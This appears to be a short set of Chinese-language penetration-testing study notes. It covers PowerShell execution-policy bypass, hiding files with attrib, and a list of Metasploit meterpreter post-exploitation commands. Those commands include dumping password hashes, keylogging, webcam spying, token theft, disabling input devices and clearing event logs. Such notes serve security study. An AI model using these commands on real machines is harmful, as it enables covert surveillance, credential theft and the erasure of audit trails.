碰到powershell无法执行脚本的情况:
执行脚本权限(策略)
Restricted 受限制
allsigned 已分配
Unrestricted 不受限制
remotesigned 远程分配
查看执行策略
- Get-ExecutionPolicy
修改执行策略(需要管理员)
- Set-ExecutionPolicy unrestricted
绕过执行策略:powershell -exec bypass -c comannd
创建文件:copy con filename
con:进入到编辑模式
修改属性:attrib
使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。attrib +s +a +h +r D:\test\project\test .txt。这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。
创建文件:fsutil file createnew filename size
meterpreter
两种session:
Command shell session –> 就是cmd
meterpreter session –> 返回meterpreter
指令:
jobs 查看工作
jobs -k id 杀死只当的工作,-k kill
jobs -K 杀死所有的工作
session 查看连接到的会话
session -k id 杀死指定的session
session -K 杀死所有的session
run -j 放到后台监听
run -z 连接到了不会立马进入到交互模式
meterpreter:
getuid 查看当前用户
sysinfo 查看当前系统的基本信息
getpid 获取当前木马的pid
getsid 获取sid
getsystem 获取管理员权限(初步提权,成功说明提权成功)
bg | background 返回控制台
exit 退出当前session(关闭)
会话迁移: payload注入到新的进程当中,确保连接的稳定性
migrate pid 会话迁移
hashdump 下载sam文件中的账号密码信息
play 播放.wav的文件
Webcam Commands:
webcam_stream 查看摄像头(相当于监控)
webcam_list 列出有多少个摄像头
webcam_snap 对摄像头做截屏
User interface Commands:
keyscan_dump 下载键盘记录
keyscan_start 开启键盘监听
keyscan_stop 停止键盘监听
screenshare 看对方的电脑桌面(实时的,有延迟),以html文件的方式
run vnc 看对方的电脑桌面(实时的,有延迟),以弹框的方式
screenshot 屏幕截图
uictl [enable/disable] [keyboard/mouse/all] 对键盘鼠标进行控制(禁用或者开启)
clearev 清除痕迹(系统日志,安全日志,应用日志)(前提有特权,才能清除的干净)
steal_token 身份盗用
rev2self 返还身份
shutdown 关机
shell 进入到cmd或者进入到bash
kill pid 杀死进程
execute -i -H -f cmd 执行指令
upload local_file remote_path 上传文件
download remote_file local_path\save_filename 下载文件
show_mount 磁盘信息
Core Commands:
background | bg 返回控制台
get_timeouts 获取session超时时间
linux:.elf,.sh
linux执行文件:
./ —> 有可执行的权限,chmod u+x file —> ./file
bash file
windows:bat,exe,hta